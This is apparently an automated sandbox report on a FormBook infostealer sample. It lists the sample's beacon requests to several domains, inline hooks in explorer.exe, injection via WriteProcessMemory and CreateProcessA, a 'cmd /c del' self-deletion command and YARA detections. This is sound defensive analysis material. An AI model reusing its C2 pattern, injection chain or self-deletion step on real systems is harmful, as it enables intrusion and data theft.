Oct 26, 2023 09:49:19.937040091 CEST	135	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Oct 2023 07:49:28 GMT Content-Type: text/html Content-Length: 785 Connection: close Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e d2 cb b4 ba ce b8 b6 b2 bb f5 d4 cb b4 fa c0 ed d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49752	199.34.228.191	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2023 09:49:39.892247915 CEST	136	OUT	GET /4hc5/?P6=tOmE+Tzzb7HQLc2SkeB2EXcbcJrVSgBrP2Nr0WPSkAyRu+Yjx9aruD7HNlgfCbohliLP&ntxh9=V48LzvX0 HTTP/1.1 Host: www.candicrem.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2023 09:49:40.089838982 CEST	137	IN	HTTP/1.1 302 Found Server: nginx Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-Control: no-cache, private Date: Thu, 26 Oct 2023 07:49:39 GMT Location: https://www.candicrem.com/4hc5 Set-Cookie: publishedsite-xsrf=eyJpdiI6IlNxc25pQkpmSCtiQXljQTFtQ2tna1E9PSIsInZhbHVlIjoiZUx3cVFiZFNKUGg5Ujd4V0pPcUNBQkRJbmFBMjBVNkk1TmJvZ0hNd2gwRmc5bktrMGMxTnNaaTZ2WkdrQWpTNWxDd3haRnowRS9FeGhqK0h0SjRhUFNzN3IxWXFDRzd3eXNPckVWeitRVHRua2JnMHpCRWRBMXhTdDhBOEFGSCsiLCJtYWMiOiI4YWM3MTQxMWI2NDcyZjNiYTUzNzdjNGEwMmQwNjZjZjk3ZjAyNTliM2I1NjgzMWVmM2Y1MzNlZjhhY2U0YTE2IiwidGFnIjoiIn0%3D; expires=Thu, 09-Nov-2023 07:49:39 GMT; Max-Age=1209600; path=/; samesite=lax Set-Cookie: XSRF-TOKEN=eyJpdiI6IktTVDZsNTNsZHlReXQ3Q2NVUjlobkE9PSIsInZhbHVlIjoiUk9SdHNCcVJkQTc3dktHSlBITEo5MGYvdUoxeEZrU2EwL1VEMVZmUEhvMkxBVkdMK3NsK0ZnMHJHVVVETzFSY1BJYzlNSWpseUZvUmduYXI0WFAxTGJYTzY2L0ZrWkx3bkRTaGovUWlUOUpYQXc4bVIwa2RJQms2c3pOWmVSQ2oiLCJtYWMiOiJiOTA2NGNmOWUwZjBiNDNlZTE5MzlmMjg1MjZiMzA4Y2QxMTBkM2Y4OGU0Y2QyNzViZmRhOGI2Mjk5NTRlNjJkIiwidGFnIjoiIn0%3D; expires=Thu, 09-Nov-2023 07:49:39 GMT; Max-Age=1209600; path=/; samesite=lax Set-Cookie: PublishedSiteSession=eyJpdiI6IkVaeUdFd3VRYjFmMzBDL2JKeHJ5YUE9PSIsInZhbHVlIjoiejh2Q3pCVG9HWFUwb1dFVVNLK0RkY0s3YlFaNGgyMXlYM3MrMy9PSGZNZm Data Raw: Data Ascii:
Oct 26, 2023 09:49:40.089878082 CEST	137	IN	Data Raw: 52 51 6b 30 77 56 57 5a 43 4d 33 5a Data Ascii: RQk0wVWZCM3Z
Oct 26, 2023 09:49:40.089899063 CEST	138	IN	Data Raw: 55 54 45 52 79 65 6e 5a 35 52 48 42 6c 57 58 5a 36 56 46 4e 53 5a 6a 56 4c 56 45 46 34 4d 6c 6c 47 54 45 46 6d 51 6b 73 79 64 44 6c 6f 59 55 35 4a 65 6a 42 31 54 6b 34 72 63 6b 52 4f 5a 57 70 6e 4f 58 67 79 52 6b 6c 55 65 6c 55 31 51 6d 4a 6c 57 Data Ascii: UTERyenZ5RHBlWXZ6VFNSZjVLVEF4MllGTEFmQksydDloYU5JejB1Tk4rckROZWpnOXgyRklUelU1QmJlWDVWTDEyQnpmMERpYk0iLCJtYWMiOiI5YmExNGY1OTM4MzE1MTBhZWJhNWNlYzJmZGQ3YjU2NzYxZTJkZTdjZjMwNDE0NjA2NDU5NTFkNjQ3NWE4MDU2IiwidGFnIjoiIn0%3D; expires=Thu, 09-Nov-2023 0
Oct 26, 2023 09:49:40.089915991 CEST	138	IN	Data Raw: 31 36 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d Data Ascii: 16e<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.candicrem.com/4hc5'" /> <title>Redirecting to https://www.candicrem.com/4hc5</title> </head>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49753	34.68.234.4	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2023 09:50:00.519356966 CEST	139	OUT	GET /4hc5/?ntxh9=V48LzvX0&P6=qEWXZ3aqpcDZ/jSVREtayCI8W2IV6onyeM8faOppXvrhittFNUzvbhLP7PFzXYy9ta8e HTTP/1.1 Host: www.therenixgroupllc.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2023 09:50:00.645550013 CEST	139	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Thu, 26 Oct 2023 07:50:00 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.therenixgroupllc.com/4hc5/?ntxh9=V48LzvX0&P6=qEWXZ3aqpcDZ/jSVREtayCI8W2IV6onyeM8faOppXvrhittFNUzvbhLP7PFzXYy9ta8e Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49754	154.86.64.96	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2023 09:50:21.217299938 CEST	140	OUT	GET /4hc5/?P6=sJ+Ygj3voyzHV2SMJ+QMiTEgoYfBBcQbem66ypT0eUfc0EimMlq1mWlKocPRS2y/b4Gk&ntxh9=V48LzvX0 HTTP/1.1 Host: www.7141999.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2023 09:50:21.514841080 CEST	141	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 26 Oct 2023 07:50:22 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49755	167.172.228.26	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2023 09:50:41.435579062 CEST	141	OUT	GET /4hc5/?ntxh9=V48LzvX0&P6=YIoXQxIAORK6HEHBIjyMxPOX2glibAcKMS7MvCp7xLT7Ek+j4imqU/IlDY2a3gBqxYgb HTTP/1.1 Host: www.pacersun.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2023 09:50:41.637140036 CEST	142	IN	HTTP/1.1 404 Server: nginx/1.20.1 Date: Thu, 26 Oct 2023 07:50:41 GMT Content-Length: 0 Connection: close

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xE1
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xE1
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xE1
GetMessageA	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xE1

Target ID:	0
Start time:	09:46:36
Start date:	26/10/2023
Path:	C:\Users\user\Desktop\881SP1exr1.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\881SP1exr1.exe
Imagebase:	0xa80000
File size:	582'656 bytes
MD5 hash:	FC8B3A3005CDC80CE19AF33A57010FA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:46:38
Start date:	26/10/2023
Path:	C:\Users\user\Desktop\881SP1exr1.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\881SP1exr1.exe
Imagebase:	0x7e0000
File size:	582'656 bytes
MD5 hash:	FC8B3A3005CDC80CE19AF33A57010FA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:46:38
Start date:	26/10/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	09:46:41
Start date:	26/10/2023
Path:	C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\chkdsk.exe
Imagebase:	0x330000
File size:	23'040 bytes
MD5 hash:	B4016BEE9D8F3AD3D02DD21C3CAFB922
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	09:46:44
Start date:	26/10/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\881SP1exr1.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:46:44
Start date:	26/10/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	135
Total number of Limit Nodes:	15

Executed Functions

Function 078D18E8 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f3f802f4b370bd29cbf6296ef67c3a79e1d3acfc24f9a45be9de057588da4c4
Instruction ID: bfc9b5f33bfb113bf15fb33cc9297cc0769a45e71b7759ba95b69a01c30f683a
Opcode Fuzzy Hash: 0f3f802f4b370bd29cbf6296ef67c3a79e1d3acfc24f9a45be9de057588da4c4
Instruction Fuzzy Hash: FE51C3B4E051199FCB04CFAAD5849AEFBF2BF99300F25D166E418A7315DB30A942CF90

Uniqueness

Uniqueness Score: -1.00%

Function 078D18D9 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c394a35a07f2d5f7c521b1f057fadc4a1b135a0d7a2c0ffe9bee195abbfe34ae
Instruction ID: d92df877ad97768607e210a7ed6c4561555e39c091704a9e71153bc8078b27f6
Opcode Fuzzy Hash: c394a35a07f2d5f7c521b1f057fadc4a1b135a0d7a2c0ffe9bee195abbfe34ae
Instruction Fuzzy Hash: 2941B4B5E015199FDB08CFAAD584A9EFBF2AF88310F14C166E418E7325DB309942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 015ECFD0 Relevance: 6.1, APIs: 4, Instructions: 131
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 015ED05E
GetCurrentThread.KERNEL32 ref: 015ED09B
GetCurrentProcess.KERNEL32 ref: 015ED0D8
GetCurrentThreadId.KERNEL32 ref: 015ED131

Memory Dump Source

Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 687f6662c0acd6f89f620c1446a80f293af342623a17dbc96b3f0e885eb3a27c
Instruction ID: b7864d55723c97c751aec9ecb9a35d4b1110055b89e69329480d1aa976b042ea
Opcode Fuzzy Hash: 687f6662c0acd6f89f620c1446a80f293af342623a17dbc96b3f0e885eb3a27c
Instruction Fuzzy Hash: 005147B0D002498FDB18DFA9D548BDEBFF1BB48304F24845AE419AB260DB749985CF66

Uniqueness

Uniqueness Score: -1.00%

Function 015ECFE0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 015ED05E
GetCurrentThread.KERNEL32 ref: 015ED09B
GetCurrentProcess.KERNEL32 ref: 015ED0D8
GetCurrentThreadId.KERNEL32 ref: 015ED131

Memory Dump Source

Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 0de0a06414f18822d2d62d84e9437e4255ff378a96668977e3bf659e9c8666ac
Instruction ID: ebe0ac5c71813b9521df1c54cd7b3a3245fc506d2da42d5af10ca6abc1fc04c2
Opcode Fuzzy Hash: 0de0a06414f18822d2d62d84e9437e4255ff378a96668977e3bf659e9c8666ac
Instruction Fuzzy Hash: E25158B0D002498FDB18DFA9D548BDEBFF1BB88304F24C459E419AB260DB749984CF66

Uniqueness

Uniqueness Score: -1.00%

Function 078D8318 Relevance: 1.8, APIs: 1, Instructions: 268
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078D8608

Memory Dump Source

Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a4ea70d0e445f7958a87901be3961c0ec4b180bb8684569762f79847cac047d5
Instruction ID: ed51770a1c8d1c4123523b64a07688a359755c7ddfca2343ad0a865e213afc45
Opcode Fuzzy Hash: a4ea70d0e445f7958a87901be3961c0ec4b180bb8684569762f79847cac047d5
Instruction Fuzzy Hash: 9DA1CBB1A005258FCB04CF2DC88066EFBF6BB89310F548A69D469DB259C774EC41CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 078D87F4 Relevance: 1.8, APIs: 1, Instructions: 252
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 078D8A36

Memory Dump Source

Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a07e1c5877a9c0754011fdff8ad02297b333e5a5bd23cc5a1ae6323e2c3b1092
Instruction ID: 5536bbb7cab12b9106d9c33ebba957896b26fa20833cefdc19d4c30dbd551376
Opcode Fuzzy Hash: a07e1c5877a9c0754011fdff8ad02297b333e5a5bd23cc5a1ae6323e2c3b1092
Instruction Fuzzy Hash: 60A15BB1D0021ADFDB10DFA9C841BEEBBB2BF54314F1485A9E848E7250DB749985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 078D8800 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 078D8A36

Memory Dump Source

Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2de37563c271052f394394a805765d77fb05e6c1f51acf8c700643e1f0e981b0
Instruction ID: 51d3eb248472ebbf7a09f47d00ce914f534b12f484df1ff2d0a8626dcf94626b
Opcode Fuzzy Hash: 2de37563c271052f394394a805765d77fb05e6c1f51acf8c700643e1f0e981b0
Instruction Fuzzy Hash: 14914AB1D0021ADFDB14DFA9C841BEDBBB2BF48314F1485A9E848E7250DB749985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 015EAD48 Relevance: 1.7, APIs: 1, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 015EAF9E

Memory Dump Source

Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 33fe3c695b3404e705d140bc799a02c6689fb664c7e1632e1e937c9ef67aa774
Instruction ID: 13e7839b9349ea38387d45d8dd0cbe4d9c95a87aa50db718547cc811a7a1bb46
Opcode Fuzzy Hash: 33fe3c695b3404e705d140bc799a02c6689fb664c7e1632e1e937c9ef67aa774
Instruction Fuzzy Hash: 0D812470A00B058FDB28DF39D54979ABBF1BF88304F10892ED49ADBA50D775E849CB90

Uniqueness

Uniqueness Score: -1.00%

Function 015E44C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015E59C9

Memory Dump Source

Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 3147a78668dd57f1bc03a412b7dd3533a37298a9bf528a9a3e9773fe259d8134
Instruction ID: 2c21ed63816d913ab002af16a7d9c7a2a57350caafb3e0b1d288bdccf39bfce8
